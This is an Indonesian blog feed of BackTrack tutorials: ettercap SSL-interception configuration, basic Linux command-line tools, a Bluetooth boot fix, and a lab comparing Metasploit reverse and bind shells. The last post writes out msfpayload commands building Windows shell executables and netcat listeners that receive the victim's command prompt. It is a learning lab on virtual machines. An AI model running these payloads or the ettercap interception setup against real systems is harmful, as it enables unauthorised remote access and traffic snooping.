Maka anda akan mendapati pengaturan seperti ini:

# if you use iptables:   #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"   #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

2. Mengubah parameter redir_command_on dan redir_command_off

Hilangkan tanda pagar sebelum redir_command_on dan redir_command_off

Sehingga pengaturannya menjadi seperti ini:

######################################       redir_command_on/off###################################### you must provide a valid script for your operating system in order to have# the SSL dissection available# note that the cleanup script is executed without enough privileges (because# they are dropped on startup). so you have to either: provide a setuid program# or set the ec_uid to 0, in order to be sure the cleanup script will be# executed properly# NOTE: this script is executed with an execve(), so you can't use pipes or# output redirection as if you were in a shell. We suggest you to make a script if# you need those commands.
#---------------#     Linux#---------------
# if you use ipchains:   #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"   #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
# if you use iptables:   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Tekan ctrl+x untuk keluar dari konsol nano. Tekan y untuk menyimpan. Tekan enter untuk menyimpan meng-overwrite file lama.

Kemudian jalankan kembali ettercap:

Command:

root@revolution:/# ettercap -T -q -i wlan0

Perfect as usual

created by : red-dragon

FIX Ettercap SSL dissection needs a valid 'redir_command_on'

noreply@blogger.com (Double Dragon) — Tue, 07 Feb 2012 05:55:00 +0000

Pengguna backtrack 5 R1 yang sudah menggunakan ettercap, mungkin mengalami masalah ini. Terdapat pesan error ketika ettercap melakukan unified sniffing. Pesan errornya adalah:

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file

Bagaimana mengatasinya?

1. Buka terminal, lalu masukan perintah:

Command:

root@revolution:/# nano /usr/local/etc/etter.conf

Maka anda akan melihat tampilan seperti ini:

Output:

#############################################################################                                                                          ##  ettercap -- etter.conf -- configuration file                            ##                                                                          ##  Copyright (C) ALoR & NaGA                                               ##                                                                          ##  This program is free software; you can redistribute it and/or modify    ##  it under the terms of the GNU General Public License as published by    ##  the Free Software Foundation; either version 2 of the License, or       ##  (at your option) any later version.                                     ##                                                                          ##  $Id: etter.conf,v 1.79 2005/07/07 10:08:55 alor Exp $                   ##                                                                          #############################################################################
[privs]ec_uid = 65534                # nobody is the defaultec_gid = 65534                # nobody is the default

2. Mengubah parameter ec_uid dan ec_gid

Perhatikan baris

ec_uid = 65534 dan ec_gid = 65534

Ubah kedua baris ini menjadi

Output:

#############################################################################                                                                          ##  ettercap -- etter.conf -- configuration file                            ##                                                                          ##  Copyright (C) ALoR & NaGA                                               ##                                                                          ##  This program is free software; you can redistribute it and/or modify    ##  it under the terms of the GNU General Public License as published by    ##  the Free Software Foundation; either version 2 of the License, or       ##  (at your option) any later version.                                     ##                                                                          ##  $Id: etter.conf,v 1.79 2005/07/07 10:08:55 alor Exp $                   ##                                                                          #############################################################################
[privs]ec_uid = 0                # nobody is the defaultec_gid = 0                # nobody is the default

Tekan ctrl+x , kemudian tekan y untuk menyimpan. Dan enter untuk menkonfirmasi.

Jalankan kembali ettercap dengan perintah.

Command:

root@revolution:/# ettercap -T -q -i wlan0

Perfect as usual =)

created by : red-dragon

Do More With CLI [Part 2]

noreply@blogger.com (Double Dragon) — Thu, 02 Feb 2012 03:37:00 +0000

Masih mau belajar perintah linux? Bagus. Ini supaya kalian ngga manja dengan kursor, alias GUI. Sebelumnya saya sudah memberikan tutorial CLI part 1. Sekarang giliran part 2.

Dalam kesempatan kali ini, saya akan mengajarkan perintah cp, cat, awk, sort, dan tee. Jangan langsung putus asa, ini sangat mudah, dan menyenangkan. Terlebih ketika anda menguasai hal ini dengan sangat baik.

Ok, langsung saja ke tutorial.

Preparation:

[*] Terminal terletak pada Applications - Accessories - Terminal

Walkthrough:

1. Buka terminal anda. Kemudian berpindahlah menuju directory /tmp

Command:

root@revolution:/# cd /tmproot@revolution:/tmp#

Mengapa kita berpindah ke directory /tmp? Tutorial kali ini, akan membuat beberapa file. Directory /tmp dirancang untuk membersihkan seluruh isinya setelah linux di-restart. Jadi file file ini akan hilang setelah linux di-restart. Yaaa, hitung-hitung kalian tidak perlu menghapus file ini, jika file ini tidak terpakai. =)

2. Perintah cp

CP adalah perintah copy, penggunaannya sangat sederhana.

Command:

root@revolution:/# cp <file yang hendak di copy> [nama file setelah dicopy]

Contoh:

Command:

root@revolution:/tmp# cp /etc/passwd passwd

menggunakan perintah cp

Kali ini saya akan meng-copy file passwd yang terletak di directory /etc. Kemudian menyimpannya dengan nama passwd.

3. Perintah cat

CAT adalah perintah untuk menampilkan isi dari sebuah file. Kurang lebih mencetak file tersebut. Ini sama seperti perintah print dalam command prompt. Penggunaan perintah cat juga sangat sederhana.

Command:

root@revolution:/# cat <file yang hendak di cetak>

Contoh:

Command:

root@revolution:/# cat passwd root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shsyslog:x:101:103::/home/syslog:/bin/falsesshd:x:102:65534::/var/run/sshd:/usr/sbin/nologinlandscape:x:103:108::/var/lib/landscape:/bin/falsemessagebus:x:104:112::/var/run/dbus:/bin/falsenobody:x:65534:65534:nobody:/nonexistent:/bin/shmysql:x:105:113::/var/lib/mysql:/bin/falseavahi:x:106:114::/var/run/avahi-daemon:/bin/falsesnort:x:107:115:Snort IDS:/var/log/snort:/bin/falsestatd:x:108:65534::/var/lib/nfs:/bin/falseusbmux:x:109:46::/home/usbmux:/bin/falsepulse:x:110:116::/var/run/pulse:/bin/falsertkit:x:111:117::/proc:/bin/falsefestival:x:112:29::/home/festival:/bin/falsepostgres:x:1000:1000::/home/postgres:/bin/shcouchdb:x:113:121:CouchDB Administrator,,,:/var/lib/couchdb:/bin/bash

menggunakan perintah cat

Kali ini saya akan mencetak isi dari file passwd.

4. Perintah awk

AWK adalah perintah untuk mencari string dalam sebuah file. Berbeda dengan grep, awk memiliki hasil yang lebih spesifik.

Contoh:

Command:

root@revolution:/ awk -F ':' '{print $1}' passwd rootdaemonbinsyssyncgamesmanlpmailnewsuucpproxywww-databackuplistircgnatslibuuidsyslogsshdlandscapemessagebusnobodymysqlavahisnortstatdusbmuxpulsertkitfestivalpostgrescouchdb

menggunakan perintah awk

Keterangan:

-F : Penggunaan -F bertujuan untuk menentukan pemisah antara kolom 1 dan kolom 2. Contoh:

Sebuah file berisi:

123 456 789

Bagian "123" adalah kolom pertama.

Bagian "456" adalah kolom kedua.

Bagian "789" adalah kolom ketiga.

Kolom ini dipisahkan oleh <spasi>. Jika kolom dipisahkan oleh spasi, maka perintah -F tidak lagi diperlukan. Namun jika file berisi:

123-456-789

Maka perintah -F digunakan untuk menentukan pemisah antar kolom. Pada file tersebut, terlihat bahwa setiap kolom dipisahkan oleh simbol "-". Sehingga perintah awk akan ditambah dengan argumen -F '-'.

5. Perintah sort

SORT adalah perintah untuk mengurutkan file berdasarkan alfabet. Penggunaan sort terbagi menjadi dua, yaitu perintah untuk mengolah output dari peritah sebelumnya, dan yang kedua adalah langsung mengurutkan sebuah file tanpa diawali dengan perintah cat atau awk.

Penggunaan sort:

Command sort [1]:

root@revolution:/tmp# sort <file yang hendak diurutkan>

Command sort [2]:

root@revolution:/tmp# cat <file yang hendak dicetak> | sort

Perintah sort yang pertama akan mengurutkan file langsung dari file sumber. Sementara perintah sort yang pertama, akan mengurutkan output dari perintah cat.

Contoh:

Kita akan mengurutkan output dari perintah awk sebelumnya. Terlihat bahwa perintah awk belum mengurutkan hasil secara aflabet.

Command :

root@revolution:/tmp# awk -F ':' '{print $1}' passwd  | sortavahibackupbincouchdbdaemonfestivalgamesgnatsirclandscapelibuuidlistlpmailmanmessagebusmysqlnewsnobodypostgresproxypulserootrtkitsnortsshdstatdsyncsyssyslogusbmuxuucpwww-data

menggunakan perintah sort

6. Perintah tee

TEE adalah perintah untuk menyimpan output dari sebuah perintah. Contoh:

Command :

root@revolution:/tmp# ifconfig wlan0 | tee > ipaddressroot@revolution:/tmp# cat ipaddress wlan0     Link encap:Ethernet  HWaddr e0:b9:a5:9d:37:e9            inet addr:192.168.1.4  Bcast:192.168.1.255  Mask:255.255.255.0          inet6 addr: fe80::e2b9:a5ff:fe9d:37e9/64 Scope:Link          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1          RX packets:12504 errors:0 dropped:0 overruns:0 frame:0          TX packets:13018 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:1000           RX bytes:7044888 (7.0 MB)  TX bytes:3387860 (3.3 MB)

Saya akan membuat perintah ifconfig wlan0, kemudian menyimpan hasil perintah ifconfig wlan0 dengan perintah tee dan menamai file tersebut dengan nama ipaddress.

Contoh:

Command :

root@revolution:/tmp# awk -F ':' '{print $1}' passwd | sort | tee > username.lst

Sebelumnya kita sudah menggunakan perintah sort, kali ini kita akan menyimpan hasil output perintah sort dengan nama username.lst

Selesai. Kamu sudah memiliki file username.lst yang berisi tentang user yang ada di linux kamu. =)

created by : red-dragon

FIX hci0 command tx timeout

noreply@blogger.com (Double Dragon) — Wed, 01 Feb 2012 15:43:00 +0000

Biasanya sebelum kita login ke BackTrack, ada peringatan dari DMESG yang isinya:

[138209.666632] usbcore: registered new interface driver btusb
[138214.844410] hci_cmd_task: hci0 command tx timeout
[138219.848340] hci_cmd_task: hci0 command tx timeout
[138224.853676] hci_cmd_task: hci0 command tx timeout
[138229.856417] hci_cmd_task: hci0 command tx timeout
[138234.860719] hci_cmd_task: hci0 command tx timeout
[138239.960585] hci_cmd_task: hci0 command tx timeout
[138240.464277] bluetoothd[5133]: segfault at 3 ip b7e39938 sp bfb8fcc8 error

Ini terjadi karena bluetooth stack driver nggak bisa UP. BackTrack di versi 5 R1memiliki kernel 2.6.39-4 yang tidak mempunyai patch kernel bluetooth. Makanya peringatan:

hci0 command tx timeout

akan selalu ada tiap kali kita booting.

Untuk menghindari hciconfig membawa interface bluetooth ini UP, kita harus memberikan sebuah perintah yang berjalan di level rc. Tambahkan baris:

hciconfig hci0 down

sebelum perintah:

exit 0

Di file:

/etc/rc.local

SCREEN-SHOT

Setelah menambahkan baris tersebut, kita bisa reboot untuk melihat hasilnya (=

blusp10it

Do More With CLI [Part 1]

noreply@blogger.com (Double Dragon) — Sat, 28 Jan 2012 05:37:00 +0000

Linux memang identik dengan CLI (Command Line Interpreter), pengguna yang manja akan lebih menyukai menggunakan kursornya untuk melakukan setiap hal, bahkan hal yang mudah. Dan ini terjadi hampir terjadi pada setiap pengguna << back | track yang notabene adalah mantan pengguna windows. "The real hacker is not using GUI"!

Oke, pertanyaan yang sering keluar adalah: "Bagaimana cara melatih penggunaan CLI?" Anda bisa mempelajarinya dari hal terkecil. Yaitu perintah grep. Grep berfungsi untuk mencari string yang dikehendaki. Ini sama dengan perintah find text pada windows. Kali ini saya akan memberikan 3 Tutorial sekaligus, yaitu tutorial grep, tutorial awk, dan tutorial sed. Dan anda bisa mencobanya sendiri.

Preparation:

[*] Terminal terletak pada Applications - Accessories - Terminal

Goal:

[*] Menampilkan IP address pada terminal

Walkthrough:

1. Grep

Buka terminal, lalu masukan perintah

Command:

root@revolution:/# ifconfig wlan0

Kita akan menampilkan konfigurasi IP pada device wlan0 (WiFi Device)

Output:

root@revolution:/# ifconfig wlan0wlan0     Link encap:Ethernet  HWaddr 00:24:36:5c:ed:e3            inet addr:192.168.1.7  Bcast:192.168.1.255  Mask:255.255.255.0          inet6 addr: fe80::224:36ff:fe5c:ede3/64 Scope:Link          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1          RX packets:96332 errors:0 dropped:0 overruns:0 frame:0          TX packets:41418 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:1000           RX bytes:49392027 (49.3 MB)  TX bytes:7373200 (7.3 MB)

Kita telah mendapatkan konfigurasi IP dari wlan0. Langkah selanjutnya adalah menggunakan perintah grep. Masukan perintah:

Command:

root@revolution:/# ifconfig wlan0 | grep "inet addr:"

Perintah grep akan mencari string "inet addr:" pada output ifconfig wlan0.

Output:

root@revolution:/# ifconfig wlan0 | grep "inet addr:"          inet addr:192.168.1.7  Bcast:192.168.1.255  Mask:255.255.255.0

Ok. Sekarang output kita semakin berkurang, dari 7 baris, menjadi 1 baris saja. Lalu, bagaimana caranya agar output menghasilkan 192.168.1.7 ?

2. Awk

Langkah selanjutnya adalah menyingkirkan inet, Bcast, dan Mask. Kita akan menggunakan perintah awk. Perintah awk akan memilih text yang berada pada kolom tertentu. Dalam output di atas, kolom 1 bernilai : inet. Dipisahkan oleh spasi terdapat kolom 2, yaitu addr:192.168.1.7. Dipisahkan oleh spasi teradapat kolom 3, yaitu Bacst:192.168.1.255. Dan dipisahkan oleh spasi terdapat kolom terakhir, yaitu Mask:255.255.255.0. Kita akan memilih kolom ke dua, sehingga ouput kita akan menampilkan value dari kolom ke 2. Masukan perintah:

Command:

root@revolution:/# ifconfig wlan0 | grep "inet addr:" | awk '{print $2}'

awk '{print $2}' akan menampilkan nilai dari kolom ke dua, yaitu addr:192.168.1.7. Terlihat dari output kita di bawah:

Output:

root@revolution:/# ifconfig wlan0 | grep "inet addr:" | awk '{print $2}'addr:192.168.1.7

Ok, sekarang hasil kita semakin sedikit. Kali ini kita akan menyingkirkan addr: untuk mendapatkan output berupa IP address.

3. Sed

Langkah berikutnya adalah menyingkirkan string addr: dari output kita, sehingga kita mendapatkan output 192.168.1.7. Untuk menyingkirkan string tertentu, perintah sed adalah sed 's/[STRING YANG AKAN DIHAPUS]//' Masukan perintah berikut:

Command:

root@revolution:/# ifconfig wlan0 | grep "inet addr:" | awk '{print $2}'| sed 's/addr://'

Perintah di atas akan menghapus string addr:, maka output yang akan terlihat adalah.

Output:

root@revolution:/# ifconfig wlan0 | grep "inet addr:" | awk '{print $2}'| sed 's/addr://'192.168.1.7

Excellent!

Created by : red-dragon

Perbedaan Reverse TCP dan Bind TCP

noreply@blogger.com (Double Dragon) — Wed, 18 Jan 2012 10:56:00 +0000

Pengguna metasploit untuk tingkat pemula, mungkin pernah bertanya-tanya. Apa perbedaan payload reverse_tcp dengan payload bind_tcp? Sederhananya, reverse adalah perintah dari attacker kepada korban, untuk menghubungi korban. Sementara bind tcp adalah perintah dari attacker kepada korban, untuk membuka akses kepada attacker. Ilustrasinya seperti ini

[reverse_tcp]

attacker -> [hubungi saya di port 4444] -> victim

setelah payload dieksekusi

attacker <-> [port 4444] <-> victim

[bind_tcp]

attacker -> [buka jalan untuk saya di port 4444] -> victim

setelah dieksekusi

attacker <-> [port 4444] <-> victim

Untuk membuktikannya, saya akan mengadakan percobaan mengenai payload. Anda bisa mencoba sendiri di rumah.

Tools requirements:

[*] msfpayload dapat ditemukan di backtrack 5

[*] netcat dapat ditemukan di backtrack 5

[*] vmware player

[*] windows XP SP 2

System requirements:

[*] VMware menggunakan koneksi NAT

[*] IP address attacker vmnet8 10.10.10.1

[*] IP address victim vmnet8 10.10.10.128

[*] Windows XP di dalam vmware telah terinstall vmware tools

Walk-through:

1. Buat PAYLOAD windows/shell_reverse_tcp

Buka terminal, kemudian masukan perintah:

Command:

root@revolution:~# msfpayload windows/shell_reverse_tcp LHOST=10.10.10.1 LPORT=4444 X > /tmp/reverse.exe

Keterangan:

[*] saya akan membuat payload windows/shell_reverse_tcp

[*] ip address saya 10.10.10.1

[*] port listener saya tentukan di 4444

[*] payload ini saya simpan di folder /tmp dengan nama reverse.exe

Buka folder /tmp, kemudian copy file reverse.exe, kemudian paste di windows XP. Kembali ke terminal, kemudian masukan perintah:

Command:

root@revolution:~# nc -l -v -p 4444

Keterangan:

[*] saya menggunakan netcat sebagai handler terhadap koneksi yang masuk

[*] menentukan netcat sebagai listener (-l)

[*] menentukan netcat untuk mengaktifkan verbose mode (-v)

[*] menentukan netcat untuk melakukan listening pada port 4444 (-p 4444)

Kemudian jalankan file reverse.exe yang ada di windows xp.

Maka ini yang akan terjadi:

Command:

root@revolution:~# nc -l -v -p 4444listening on [any] 4444 ...10.10.10.128: inverse host lookup failed: Unknown server error : Connection timed outconnect to [10.10.10.1] from (UNKNOWN) [10.10.10.128] 1062Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\User\Desktop>

FAQ [Frequently Asked Questions]

[Q] Apa fungsi payload yang kita buat?

[A] Payload yang kita buat, memiliki perintah dari attacker kepada victim untuk menghubungi attacker di port 4444

[Q] Mengapa kita mendapatkan command prompt milik victim?

[A] Itu karena payload yang kita buat adalah shell_reverse_tcp, ini berfungsi agar netcat mengeksekusi shell aka command prompt (pada windows) setelah konesi di port 4444 terjadi

[Q] Bisakah saya menentukan di port yang berbeda selain 4444?

[A] Bisa, dengan syarat port tersebut sedang tidak digunakan oleh proses lain, misalkan port 80 yang biasa digunakan oleh Apache, atau 22 yang biasa digunakan oleh OpenBSD untuk SSH connection.

2. Buat payload windows/shell_bind_tcp

Buka terminal, kemudian masukan perintah:

Command:

root@revolution:~# msfpayload windows/shell_bind_tcp LPORT=4444 X > /tmp/bind.exe

Keterangan:

[*] Saya akan membuat payload windows/shell_bind_tcp

[*] Saya menentukan 4444 sebagai port listener agar attacker dapat masuk ke system milik victim

[*] Saya menyimpan payload di folder /tmp dengan nama bind.exe

Buka folder /tmp, kemudian copy bind.exe ke Windows XP. Jangan jalankan file ini terlebih dahulu!

Buka command prompt windows, kemudian ketik

Command:

C:\Documents and Settings\User> netstat -an | find "4444"

Keterangan:

[*] netstat adalah perintah command prompt untuk mengecek koneksi yang terjadi dalam sebuah system

[*] saya akan mengecek, apakah port 4444 terbuka

Terlihat bahwa port 4444 tidak terbuka. Setelah itu, jalankan file bind.exe. Kemudian masukan perintah netstat kembali pada command prompt:

Command:

C:\Documents and Settings\User> netstat -an | find "4444"

Terlihat bahwa sekarang muncul port 4444 yang melakukan listening terhadap koneksi. Kali ini kita akan menggunakan netcat untuk mendapatkan command prompt milik victim.

Command:

root@revolution:~# nc -v 10.10.10.128 4444

Maka ini yang akan terjadi:

Command:

root@revolution:~# nc -v 10.10.10.128 444410.10.10.128: inverse host lookup failed: Unknown server error : Connection timed out(UNKNOWN) [10.10.10.128] 4444 (?) openMicrosoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\User\Desktop>

Keterangan:

[*] Kali ini saya akan menghubungi IP address victim [10.10.10.128]

[*] Saya akan mencoba port 4444 untuk akses masuk

FAQ [Frequently Asked Question]

[Q] Apa yang terjadi?

[A] Payload kita telah membuat victim membuka port 4444 agar attacker dapat masuk ke system korban

Created by: red-dragon